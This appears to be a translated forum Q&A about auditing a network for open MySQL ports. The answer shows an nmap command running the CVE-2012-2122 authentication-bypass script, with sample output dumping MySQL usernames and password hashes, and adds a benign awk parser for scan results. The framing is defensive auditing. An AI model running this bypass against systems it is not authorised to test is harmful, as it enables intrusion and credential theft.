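Test script - find open MySQL ports and check the database

Time: 2017-11-27 11:08:39

Tags: mysql bash shell perl security

The following problem:

I want to check all open MySQL ports in the network and give myself a list.

  • After that I want to check whether I can access the MySQL database from the open port.

This is just a security check script, to prevent other people from accessing the database.

Bash / Perl / PowerShell ... maybe someone can give me a hint?

1 answer:

Answer 0 (score: 3)

You can use NMAP for all port-scanning tasks.

Edit

Let's take an example: mysql-vuln-cve2012-2122 (this vulnerability check tries to access the MySQL server through the open port by bypassing authentication and, if possible, also dumps the MySQL usernames and password hashes.)

Prerequisite: you need the 'Vulns' library, which has to be installed separately. Please read the documentation for more information on how to install it and for other details, as explaining it here would be too tedious.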

mysql-vuln-cve2012-2122.pass
MySQL password. Default: nmapFTW.

mysql-vuln-cve2012-2122.user
MySQL username. Default: root.

mysql-vuln-cve2012-2122.iterations
Connection retries. Default: 1500.

mysql-vuln-cve2012-2122.socket_timeout
Socket timeout. Default: 5s.

Leave the password blank to check for the non-password vulnerability.

Command to run:

nmap -p3306 --script mysql-vuln-cve2012-2122 <target>

This is your MySQL instance

This will give an output like the following:

PORT     STATE SERVICE REASON
3306/tcp open  mysql   syn-ack
mysql-vuln-cve2012-2122:
VULNERABLE:
Authentication bypass in MySQL servers.
State: VULNERABLE
 IDs:  CVE:CVE-2012-2122
  Description:
    When a user connects to MariaDB/MySQL, a token (SHA
    over a password and a random scramble string) is calculated and compared
    with the expected value. Because of incorrect casting, it might've
    happened that the token and the expected value were considered equal,
    even if the memcmp() returned a non-zero value. In this case
    MySQL/MariaDB would think that the password is correct, even while it is
    not.  Because the protocol uses random strings, the probability of
    hitting this bug is about 1/256.
    Which means, if one knows a user name to connect (and "root" almost
    always exists), she can connect using *any* password by repeating
    connection attempts. ~300 attempts takes only a fraction of second, so
    basically account password protection is as good as nonexistent.

  Disclosure date: 2012-06-9
  Extra information:
  Server granted access at iteration #204
  root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
  debian-sys-maint:*BDA9386EE35F7F326239844C185B01E3912749BF
  phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11

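For more details, please refer to the link above.

The NMAP tool does not only help you get a list of port-related vulnerabilities. It can also be used to search for other vulnerabilities such as MySQL injection, DDoS, brute-force vulnerabilities and more. However, you need to download separate libraries for these.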
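
Added example (not part of the original answer): for the first part of the question, the list of hosts with an open MySQL port can be built by parsing nmap's grepable output (`-oG`) from a scan of a network you administer. The function names, the sample scan lines and the 192.0.2.x addresses are constructed for illustration.

```shell
#!/bin/sh
# Added example: build the list of hosts with an open MySQL port from
# nmap grepable output. Real input for a network you administer:
#   nmap -p3306 -oG mysql-scan.gnmap <your-subnet>

# Constructed sample of `nmap -oG` output (documentation addresses only).
sample_gnmap() {
  printf '# Nmap scan (constructed sample)\n'
  printf 'Host: 192.0.2.10 (db1.example.internal)\tStatus: Up\n'
  printf 'Host: 192.0.2.10 (db1.example.internal)\tPorts: 22/open/tcp//ssh///, 3306/open/tcp//mysql///\n'
  printf 'Host: 192.0.2.11 ()\tPorts: 3306/filtered/tcp//mysql///\n'
  printf 'Host: 192.0.2.12 ()\tPorts: 3306/open/tcp//mysql///\tIgnored State: closed (1)\n'
  printf 'Host: 192.0.2.13 ()\tPorts: 3306/closed/tcp//mysql///, 33060/open/tcp//mysqlx///\n'
}

# Reads grepable output on stdin; prints "IP hostname" for each host whose
# TCP port $1 (default 3306) is in state "open". Filtered/closed are skipped.
open_mysql_hosts() {
  awk -F'\t' -v port="${1:-3306}" '
    /^Host: / {
      split($1, h, " ")                    # h[2] = IP, h[3] = "(hostname)"
      name = h[3]; gsub(/[()]/, "", name)
      if (name == "") name = "-"
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        ports = $i; sub(/^Ports: /, "", ports)
        n = split(ports, entry, /, */)
        for (j = 1; j <= n; j++) {
          split(entry[j], f, "/")          # f[1]=port f[2]=state f[3]=protocol
          if (f[1] == port && f[2] == "open" && f[3] == "tcp")
            print h[2], name
        }
      }
    }'
}

# With a file argument parse that file, otherwise run on the constructed sample.
if [ -n "${1:-}" ]; then
  open_mysql_hosts 3306 < "$1"
else
  sample_gnmap | open_mysql_hosts 3306
fi
```

Each host on the resulting list is a candidate for a firewall rule or a `bind-address` restriction before any access check is run against it.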